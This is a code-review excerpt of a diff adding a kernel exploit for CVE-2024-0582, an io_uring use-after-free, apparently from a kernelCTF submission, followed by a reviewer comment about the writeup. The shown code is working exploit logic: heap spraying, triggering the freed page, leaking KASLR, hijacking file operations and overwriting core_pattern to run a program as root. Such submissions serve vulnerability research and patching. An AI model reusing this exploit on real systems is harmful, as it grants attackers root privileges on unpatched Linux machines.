pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit.c

```diff
@@ -0,0 +1,254 @@
+  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
+  logi("uring_fd = %d", uring_fd);
+
+  // spray pbuf and mmap buffer in order to create multiple single-page UAFs at
+  // the same time to increase the exploit stability
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    struct io_uring_buf_reg reg = {
+        .ring_entries = 1, .bgid = i, .flags = IOU_PBUF_RING_MMAP};
+    SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING,
+                   &reg, 1));
+
+    pbuf_mappings[i] =
+        SYSCHK(mmap(NULL, PAGE_SZ, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd,
+                    IORING_OFF_PBUF_RING + (i << IORING_OFF_PBUF_SHIFT)));
+    logi("[pbuf %d] mapped @ %p", i, pbuf_mappings[i]);
+  }
+
+  // trigger page UAF
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    struct io_uring_buf_reg unreg = {.bgid = i};
+    SYSCHK(syscall(__NR_io_uring_register, uring_fd,
+                   IORING_UNREGISTER_PBUF_RING, &unreg, 1));
+  }
+
+  // spray enough `struct file` to reuse the UAF page from PCP list
+  char buf[1024] = {};
+  for (int i = 0; i < SPRAY_FILE_NUM; i++) {
+    spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666));
+    // later we can observe the write retval at victim_file->f_pos
+    SYSCHK(write(spray_fds[i], buf, i));
+  }
+
+  // locate victim_file
+  void *victim_file_addr = NULL;
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    if (victim_file_addr)
+      break;
+    for (int j = 0; j < PAGE_SZ; j += ALIGNED_FILE_SZ) {
+      size_t shmem_file_operations =
+          *(size_t *)(pbuf_mappings[i] + j + OFFSET_FILE_FOP);
+      if ((shmem_file_operations & 0xfffff) ==
+          (SHMEM_FILE_OPERATIONS & 0xfffff)) {
+        victim_file_addr = pbuf_mappings[i] + j;
+        logi("victim_file_addr %p", victim_file_addr);
+        break;
+      }
+    }
+  }
+
+  // get victim_file index and leak kaslr
+  size_t victim_file_idx = *(size_t *)(victim_file_addr + OFFSET_FILE_FPOS);
+  size_t shmem_file_operations =
+      *(size_t *)(victim_file_addr + OFFSET_FILE_FOP);
+  size_t kaslr = shmem_file_operations - SHMEM_FILE_OPERATIONS;
+  size_t signalfd_fops = SIGNALFD_FOPS + kaslr;
+  size_t core_pattern = CORE_PATTERN + kaslr;
+  size_t private_data_before =
+      *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA);
+  logi("victim_file_idx @ 0x%lx", victim_file_idx);
+  logi("shmem_file_operations @ 0x%lx", shmem_file_operations);
+  logi("private_data_before @ 0x%lx", private_data_before);
+  logi("kaslr @ 0x%lx", kaslr);
+
+  // modify victim_file's fops to signalfd_fops
+  *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = signalfd_fops;
+  // fake victim_file's private_data to overwrite core_pattern
+  char *fake = "|/proc/%P/fd/666 %P";
+  for (int i = 0; i <= strlen(fake); i++) { // include the null byte
+    *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = (core_pattern + i);
+    size_t mask = ~fake[i];
```

Comment:
I would comment here and/or to the writeup that you have to use `~fake[i]` instead of `fake[i]` because the kernel calls `signotset(mask)` which do the same.